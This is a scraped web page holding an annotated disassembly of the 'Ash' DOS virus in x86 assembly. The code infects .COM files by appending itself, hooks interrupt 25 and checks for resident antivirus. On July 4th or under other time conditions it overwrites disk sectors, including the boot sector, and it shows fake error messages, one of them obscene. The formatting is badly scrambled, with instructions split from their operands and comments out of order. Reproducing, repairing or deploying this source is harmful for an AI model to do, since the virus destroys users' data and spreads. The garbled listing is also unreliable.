
  • November 2019
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  • Words: 1,314
  • Pages: 7
;************************************************************************** ;* the ash virus * ;************************************************************************** ;* caution! this virus performs absolute disk writes when it activated! * ;*it checks for something in memory, probably some resident av utility. * ;* (in other words, it can trash your disk!) * ;* disassembly by black wolf * ;************************************************************************** .model tiny .radix 16 .code org 100 start: jmp start_virus id_byte: db 1ah ;************************************************************************** ;* infected program goes here. * ;************************************************************************** storage_bytes: nop nop int

;first four bytes of host program. 20

;************************************************************************** ;* virus entry point (start_virus) * ;************************************************************************** start_virus: call get_offset get_offset: pop bp sub bp,offset get_offset ;get offset of virus mov [bp+store_ax],ax xor mov mov mov mov mov lea mov mov mov

di,di word ptr [di+4ah],0 es,di si,96 bx,es:[si] cx,es:[si+2] dx,[bp+int_25] es:[si],dx dx,cs es:[si+2],dx

;in reserved area of psp ;es=0 (interrupt table) ;si=96 (int 25) ;get int 25 address ;int 25 handler ;set int 25 address

; the code below seems to check for either another virus or perhaps an ;anti-viral program in memory that sets the address of int 7f to ffffh to ;mark its presence. this may be to avoid detection by certain memory ;resident anti-viral utilities that analyse behavior, or to prevent conflicts ;with another virus. a tsr vaccine might also be a possibility. mov cmp jne jmp nop

si,es:[di+1fe] si,0ffffh restore_host_and_infect short restore_control

;int 7f (marker) ;has it been set? ;no, jump restore_host_and... ;already set, jump to ;restore_control

restore_host_and_infect: mov cs:[di+4ch],bx ;save old int 25 address mov cs:[di+4eh],cx ;inside psp ("reserved" area) push cs pop es mov byte ptr [bp+infect_count],0 ;reset infect counter lea si,[bp+storage_bytes] ;si=storage bytes mov di,100 ;di=start of com mov cx,4 cld rep movsb ;restore storage mov ah,1ah ;bytes to host lea dx,[bp+new_dta] ;ds:dx = new_dta int 21h ;change dta to new_dta mov lea lea push jmp

ah,4eh dx,[bp+file_mask] si,[bp+new_dta+1e] dx short find_first_next


;setup find first for *.com ;set si=filename in dta ;save mask address

;this restores defaults and ;gives control to host com.

mov mov int

ah,1ah dx,80 21h

xor mov mov mov mov mov mov push pop mov mov mov mov mov mov mov push mov ret

di,di es,di si,96 bx,cs:[di+4ch] es:[si],bx cx,cs:[di+4eh] es:[si+2],cx cs es ax,[bp+store_ax] bx,di cx,bx dx,cx si,dx sp,0fffe bp,100 bp bp,ax

or jz mov int

bx,bx find_next ah,3eh 21h



;reset dta to default in psp ;es:di=interrupt table ;es:si=int 25 ;get old int 25 address ;and restore int 25

;restore ax to original ;zero registers

;restore sp to default ;bp=start of com file ;push 100 for ret ;reset bp ;go to cs:100 to restore ;control to host program



;close file if handle is ;not 0 (console)

mov find_first_next: pop push xor xor int


jnc jmp nop infect_file: mov mov int

infect_file short no_more_files

dx dx cx,cx bx,bx 21h

;find next

;find first/next match ;with normal attributes

ax,3d02h dx,si 21h

;open file for read/write

jc mov mov mov lea int

close_file bx,ax ah,3fh cx,4 dx,[bp+storage_bytes] 21h

;jump on error

cmp je cmp je

byte ptr [bp+storage_bytes+3],1ah close_file byte ptr [bp+storage_bytes],4dh close_file

mov xor xor int

ax,4202h cx,cx dx,dx 21h

cmp ja mov mov mov lea int

ax,0fd00h close_file [bp+file_size],ax ah,40h cx,4 dx,[bp+storage_bytes] 21h

mov mov lea int

ah,40h cx,end_virus-start_virus ;cx=virus size dx,[bp+start_virus] ;write from start of virus 21h ;append virus to host

mov xor xor int

ax,4200h cx,cx dx,dx 21h

mov inc mov mov mov

ax,[bp+file_size] ;setup jump ax word ptr [bp+storage_bytes+1],ax byte ptr [bp+storage_bytes],0e9h byte ptr [bp+storage_bytes+3],1ah



;read four bytes into storage ;check for id byte. ;already infected... ;is it an exe? ;yes? don't infect.

;got to the end of file

;is file over 64768 bytes? ;too big, jump close_file

;write storage bytes

;move back to beginning of file

;jump size ;jump command ;id byte

mov lea int inc jmp no_more_files: cmp jae mov cmp je


cx,4 dx,[bp+storage_bytes] 21h

;write jump to file

byte ptr [bp+infect_count] close_file

;increment infect_count

lea mov int

byte ptr [bp+infect_count],2 ;check infect_count activation ;if >=2 go activation di,100 word ptr [di],20cdh ;are first bytes an "int 20"? activation ;yes? activate, it's probably ;bait. (i.e. a researcher.) dx,[bp+parent_dir] ah,3bh 21h ;move back one directory



;in root directory? activate.

mov jmp

ah,4eh find_first_next

;find next file

xor mov mov int

di,di es,di ah,2ah 21h

;get date/time

;if the virus is run on the fourth of july, it will trash sector 0 of the ;default drive, killing the boot sector.


cmp jne cmp jne xor jmp nop

dl,4 not_yet dh,7 not_yet ax,ax short trash_disk

mov int

ah,2ch 21h

;get time

or jnz cmp jge

cl,cl dont_kill_hd ch,6 dont_kill_hd

;do minutes = 0? ;no? jump dont_kill_hd ;is it passed 6:00 am? ;yes? jump dont_kill_hd

stupid_damage_algorithm: add cl,ch mov ax,cx cbw add al,dh adc al,dl adc or jnz

ah,0 ax,ax trash_disk

;is it the fourth? ;no? jump to not_yet ;is it july? ;no? jump to not_yet ;trash boot sector ;on july fourth.

;add minutes and hours ;change the byte to a word ;add the month ;add the day, carrying result ;from the last addition ;add any carried numbers ;and if it all comes out zero ;set ax=1, otherwise keep ax.





;trash disks either way.


mov xor mov int int dont_kill_hd: mov mov int inc lower_sec_loop: cmp jl sub jmp

;sector #. this will be more ;or less random except on july ;fourth, when it kills sector 0, ;which contains the boot sector. ;number of sectors to trash ;address to write from

cx,1 bx,bx ah,19h 21h 26h

;get default drive ;and trash sector.

bx,offset random_table ah,2ch 21h dh

;get time

;increment seconds ;(prevent 0)

dh,byte ptr [rnd_string_key] random_alg dh,byte ptr [rnd_string_key] short lower_sec_loop ;dh = 01h to 0ah


;get a random number to choose string. mov mov cbw

al,dh cl,al

;move random number to al ;and to cl (minutes) ;make al into word ax ;(in this case, zeros ah) ;ax is now between 1 and 45h (69)

shl add mov

ax,1 bx,ax si,[bx] ; ;

mov mov mov int

ch,[si-1] dx,si ah,9 21h

cmp jne

ch,0 halt

;was the byte from [si-1] a 0? ;if not, jump halt


;kill program

terminate_program: int halt:

;multiply by 2 ;add ax to bx (selection address) ;get byte from address at [bx] into si this will contain the address of a string to print.

cmp jne hlt choose_what_ta_do:

;get byte from si-1 into ch ;print chosen string at dx until a '$'

ch,1 ;was it a 1? choose_what_ta_do ;if not, jump to choose_what_ta_do ;otherwise, halt processor


cmp je

ch,2 abort_retry_etc

jmp abort_retry_etc: lea mov int


restore_control dx,[bp+error_message_1] ;display "abort, retrt" etc.. ah,9 21h

mov int

ah,1 21h

lea mov int

dx,[bp+carriage_ret] ah,9 21h

mov cmp ja add

dh,cl al,5ah harass_em al,20h

cmp je cmp jne lea mov int

al,61h terminate_program al,72h harass_em_more dx,[bp+carriage_ret] ah,9 21h

jmp harass_em_more: cmp je cmp jne

al,69h go_to_host al,66h abort_retry_etc

;set letter to lowercase ;if (a)bort then jump to ;terminate_program ;if (r)etry then go on, ;otherwise jump to harass_em_more ;print a carriage return

;if user presses (i)gnore ;jump to go_to_host, (f)ail ;continue, anything else ;then jump to abort_retry_etc

dx,[bp+error_message_2] ah,9 21h ;display "fail on int 24"


20h db db

db db

;terminate program

0ah 65h, 03h, 8ah, 03h,0aeh, 03h 0d4h, 03h,0d4h, 03h,0d4h, 03h 0d4h, 03h,0d4h, 03h,0d4h, 03h 0d4h, 03h

;used to select string

0dh,0a,'abort, retry, ignore, fail?$' 0dh,0a,24 0dh,0a,0dh,0a,'fail on int 24',0dh,0a,24



;print a return

short random_alg

error_message_1 db carriage_ret db error_message_2 db


;get key with echo

lea mov int

rnd_string_key random_table db db db


;was it a 2? ;if so, jump to abort_retry_etc ;otherwise, run host

02h db db db

'impotence error reading user''s dick$'

0 01h

'program too big to fit in memory',0dh,0a,24 'cannot load command, system halted',0dh,0a,24

db dumb_mes_4 int_25:

3 db

xor iret

'joker!',0dh,0a,0dh,0a,24 al,al

file_mask parent_dir

db db

'*.com',0 '..',0

end_virus: new_dta store_ax infect_count file_size

db dw db dw

2bh dup (?) ? ? ?



;int 25 handler

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